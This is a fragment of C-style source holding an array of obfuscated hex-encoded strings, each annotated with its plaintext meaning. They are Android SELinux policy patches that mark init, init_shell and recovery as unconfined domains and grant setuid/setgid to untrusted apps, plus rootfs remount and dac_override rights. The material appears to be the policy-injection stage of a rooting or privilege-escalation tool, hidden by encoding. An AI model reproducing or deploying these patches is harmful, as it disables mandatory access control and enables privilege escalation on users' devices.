    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0e\x0c\x00\x39\x31", // "allow:untrusted_app:devpts:chr_file:ioctl"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:untrusted_app:devpts:chr_file:getattr"
    "\x63\x53\x06\x06\x31\x31\x0c\x34\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:untrusted_app:untrusted_app_devpts:chr_file:open"
    "\x63\x53\x06\x06\x31\x31\x0c\x34\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:untrusted_app:untrusted_app_devpts:chr_file:read"
    "\x63\x53\x07\x06\x31\x31\x0c\x34\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:untrusted_app:untrusted_app_devpts:chr_file:write"
    "\x63\x53\x07\x06\x31\x31\x0c\x34\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0e\x0c\x00\x39\x31", // "allow:untrusted_app:untrusted_app_devpts:chr_file:ioctl"
    "\x63\x53\x09\x06\x31\x31\x0c\x34\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:untrusted_app:untrusted_app_devpts:chr_file:getattr"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x06\x00\x00\x0a\x35\x39", // "allow:zygote:init:unix_stream_socket:accept"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x31\x0e\x30\x39\x0a\x33", // "allow:zygote:init:unix_stream_socket:listen"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:zygote:init:unix_stream_socket:getattr"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x04\x0a\x39\x0c\x35\x39", // "allow:zygote:init:unix_stream_socket:getopt"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:zygote:init:unix_stream_socket:setattr"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x30\x0a\x39\x0c\x35\x39", // "allow:zygote:init:unix_stream_socket:setopt"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x06\x00\x00\x0a\x35\x39", // "allow:zygote:init_shell:unix_stream_socket:accept"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x31\x0e\x30\x39\x0a\x33", // "allow:zygote:init_shell:unix_stream_socket:listen"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:zygote:init_shell:unix_stream_socket:getattr"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x04\x0a\x39\x0c\x35\x39", // "allow:zygote:init_shell:unix_stream_socket:getopt"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:zygote:init_shell:unix_stream_socket:setattr"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x30\x0a\x39\x0c\x35\x39", // "allow:zygote:init_shell:unix_stream_socket:setopt"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x06\x00\x00\x0a\x35\x39", // "allow:zygote:recovery:unix_stream_socket:accept"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x31\x0e\x30\x39\x0a\x33", // "allow:zygote:recovery:unix_stream_socket:listen"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:zygote:recovery:unix_stream_socket:getattr"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x04\x0a\x39\x0c\x35\x39", // "allow:zygote:recovery:unix_stream_socket:getopt"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:zygote:recovery:unix_stream_socket:setattr"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x30\x0a\x39\x0c\x35\x39", // "allow:zygote:recovery:unix_stream_socket:setopt"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x06\x00\x00\x0a\x35\x39", // "allow:system_server:init:unix_stream_socket:accept"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x31\x0e\x30\x39\x0a\x33", // "allow:system_server:init:unix_stream_socket:listen"
    "\x63\x53\x03\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:system_server:init:unix_stream_socket:getattr"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x04\x0a\x39\x0c\x35\x39", // "allow:system_server:init:unix_stream_socket:getopt"
    "\x63\x53\x03\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:system_server:init:unix_stream_socket:setattr"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x0e\x33\x0e\x39\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x30\x0a\x39\x0c\x35\x39", // "allow:system_server:init:unix_stream_socket:setopt"
    "\x63\x53\x08\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x06\x00\x00\x0a\x35\x39", // "allow:system_server:init_shell:unix_stream_socket:accept"
    "\x63\x53\x08\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x31\x0e\x30\x39\x0a\x33", // "allow:system_server:init_shell:unix_stream_socket:listen"
    "\x63\x53\x09\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:system_server:init_shell:unix_stream_socket:getattr"
    "\x63\x53\x08\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x04\x0a\x39\x0c\x35\x39", // "allow:system_server:init_shell:unix_stream_socket:getopt"
    "\x63\x53\x09\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:system_server:init_shell:unix_stream_socket:setattr"
    "\x63\x53\x08\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x30\x0a\x39\x0c\x35\x39", // "allow:system_server:init_shell:unix_stream_socket:setopt"
    "\x63\x53\x06\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x06\x00\x00\x0a\x35\x39", // "allow:system_server:recovery:unix_stream_socket:accept"
    "\x63\x53\x06\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x31\x0e\x30\x39\x0a\x33", // "allow:system_server:recovery:unix_stream_socket:listen"
    "\x63\x53\x07\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:system_server:recovery:unix_stream_socket:getattr"
    "\x63\x53\x06\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x04\x0a\x39\x0c\x35\x39", // "allow:system_server:recovery:unix_stream_socket:getopt"
    "\x63\x53\x07\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:system_server:recovery:unix_stream_socket:setattr"
    "\x63\x53\x06\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x30\x0a\x39\x0c\x35\x39", // "allow:system_server:recovery:unix_stream_socket:setopt"
    "\x63\x53\x03\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x00\x06\x35\x06\x07\x0e\x31\x0e\x39\x3e\xff\x30\x0a\x39\x3a\x0e\x09", // "allow:system_server:system_server:capability:setuid"
    "\x63\x53\x03\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x00\x06\x35\x06\x07\x0e\x31\x0e\x39\x3e\xff\x30\x0a\x39\x04\x0e\x09", // "allow:system_server:system_server:capability:setgid"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x00\x06\x35\x06\x07\x0e\x31\x0e\x39\x3e\xff\x30\x0a\x39\x3a\x0e\x09", // "allow:system_app:system_app:capability:setuid"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x00\x06\x35\x06\x07\x0e\x31\x0e\x39\x3e\xff\x30\x0a\x39\x04\x0e\x09", // "allow:system_app:system_app:capability:setgid"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x00\x06\x35\x06\x07\x0e\x31\x0e\x39\x3e\xff\x30\x0a\x39\x3a\x0e\x09", // "allow:platform_app:platform_app:capability:setuid"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x00\x06\x35\x06\x07\x0e\x31\x0e\x39\x3e\xff\x30\x0a\x39\x04\x0e\x09", // "allow:platform_app:platform_app:capability:setgid"
    "\x63\x53\x03\x06\x31\x31\x0c\x34\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x00\x06\x35\x06\x07\x0e\x31\x0e\x39\x3e\xff\x30\x0a\x39\x3a\x0e\x09", // "allow:untrusted_app:untrusted_app:capability:setuid"
    "\x63\x53\x03\x06\x31\x31\x0c\x34\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x00\x06\x35\x06\x07\x0e\x31\x0e\x39\x3e\xff\x30\x0a\x39\x04\x0e\x09", // "allow:untrusted_app:untrusted_app:capability:setgid"
    "\x63\x53\x23\x06\x39\x39\x37\x06\x09\x09\xff\x0e\x33\x0e\x39\xff\x09\x0c\x32\x06\x0e\x33", // "attradd:init:domain"
    "\x63\x53\x2d\x06\x39\x39\x37\x06\x09\x09\xff\x0e\x33\x0e\x39\xff\x3a\x33\x00\x0c\x33\x0b\x0e\x33\x0a\x09\x09\x0c\x32\x06\x0e\x33", // "attradd:init:unconfineddomain"
    "\x63\x53\x26\x06\x39\x39\x37\x06\x09\x09\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\x09\x0c\x32\x06\x0e\x33", // "attradd:init:appdomain"
    "\x63\x53\x26\x06\x39\x39\x37\x06\x09\x09\xff\x0e\x33\x0e\x39\xff\x33\x0a\x39\x09\x0c\x32\x06\x0e\x33", // "attradd:init:netdomain"
    "\x63\x53\x2c\x06\x39\x39\x37\x06\x09\x09\xff\x0e\x33\x0e\x39\xff\x07\x31\x3a\x0a\x39\x0c\x0c\x39\x0d\x09\x0c\x32\x06\x0e\x33", // "attradd:init:bluetoothdomain"
    "\x63\x53\x10\x06\x39\x39\x37\x06\x09\x09\xff\x0e\x33\x0e\x39\xff\x07\x0e\x33\x09\x0a\x37\x30\x0a\x37\x3b\x0e\x00\x0a\x09\x0c\x32\x06\x0e\x33", // "attradd:init:binderservicedomain"
    "\x63\x53\x29\x06\x39\x39\x37\x06\x09\x09\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x09\x0c\x32\x06\x0e\x33", // "attradd:init_shell:domain"
    "\x63\x53\x13\x06\x39\x39\x37\x06\x09\x09\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3a\x33\x00\x0c\x33\x0b\x0e\x33\x0a\x09\x09\x0c\x32\x06\x0e\x33", // "attradd:init_shell:unconfineddomain"
    "\x63\x53\x2c\x06\x39\x39\x37\x06\x09\x09\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\x09\x0c\x32\x06\x0e\x33", // "attradd:init_shell:appdomain"
    "\x63\x53\x2c\x06\x39\x39\x37\x06\x09\x09\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x33\x0a\x39\x09\x0c\x32\x06\x0e\x33", // "attradd:init_shell:netdomain"
    "\x63\x53\x12\x06\x39\x39\x37\x06\x09\x09\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x07\x31\x3a\x0a\x39\x0c\x0c\x39\x0d\x09\x0c\x32\x06\x0e\x33", // "attradd:init_shell:bluetoothdomain"
    "\x63\x53\x16\x06\x39\x39\x37\x06\x09\x09\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x07\x0e\x33\x09\x0a\x37\x30\x0a\x37\x3b\x0e\x00\x0a\x09\x0c\x32\x06\x0e\x33", // "attradd:init_shell:binderservicedomain"
    "\x63\x53\x27\x06\x39\x39\x37\x06\x09\x09\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x09\x0c\x32\x06\x0e\x33", // "attradd:recovery:domain"
    "\x63\x53\x11\x06\x39\x39\x37\x06\x09\x09\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x00\x0c\x33\x0b\x0e\x33\x0a\x09\x09\x0c\x32\x06\x0e\x33", // "attradd:recovery:unconfineddomain"
    "\x63\x53\x2a\x06\x39\x39\x37\x06\x09\x09\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\x09\x0c\x32\x06\x0e\x33", // "attradd:recovery:appdomain"
    "\x63\x53\x2a\x06\x39\x39\x37\x06\x09\x09\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x33\x0a\x39\x09\x0c\x32\x06\x0e\x33", // "attradd:recovery:netdomain"
    "\x63\x53\x10\x06\x39\x39\x37\x06\x09\x09\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x07\x31\x3a\x0a\x39\x0c\x0c\x39\x0d\x09\x0c\x32\x06\x0e\x33", // "attradd:recovery:bluetoothdomain"
    "\x63\x53\x14\x06\x39\x39\x37\x06\x09\x09\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x07\x0e\x33\x09\x0a\x37\x30\x0a\x37\x3b\x0e\x00\x0a\x09\x0c\x32\x06\x0e\x33", // "attradd:recovery:binderservicedomain"
    "\x63\x53\x2c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x32\x0c\x3a\x33\x39\x0c\x33", // "allow:init:fuse:file:mounton"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x32\x0c\x3a\x33\x39\x0c\x33", // "allow:init:zygote_exec:file:mounton"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x07\x31\x0c\x00\x08\xdc\x09\x0a\x3b\x0e\x00\x0a\xff\x07\x31\x08\xdc\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:recovery:block_device:blk_file:read"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x06\x07\x0a\x31\x09\x0b\x30\xff\x0b\x0e\x31\x0a\x30\x3e\x30\x39\x0a\x32\xff\x37\x0a\x32\x0c\x3a\x33\x39", // "allow:recovery:labeldfs:filesystem:remount"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\x30\x3e\x30\x39\x0a\x32\xff\x37\x0a\x32\x0c\x3a\x33\x39", // "allow:recovery:rootfs:filesystem:remount"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x08\x0a\x37\x33\x0a\x31\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x30\x0a\x39\x30\x00\x0d\x0a\x09", // "allow:recovery:kernel:process:setsched"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x00\x06\x35\x06\x07\x0e\x31\x0e\x39\x3e\xff\x0b\x30\x0a\x39\x0e\x09", // "allow:recovery:recovery:capability:fsetid"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x00\x06\x35\x06\x07\x0e\x31\x0e\x39\x3e\xff\x09\x06\x00\xdc\x0c\x3b\x0a\x37\x37\x0e\x09\x0a", // "allow:recovery:recovery:capability:dac_override"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x00\x37\x0a\x06\x39\x0a", // "allow:recovery:system_file:dir:create"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x30\x0e\x04\x33\x3a\x31\x31", // "allow:init:recovery:process:signull"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:init:system_file:lnk_file:create"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:init:system_file:lnk_file:unlink"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:recovery:system_file:lnk_file:create"
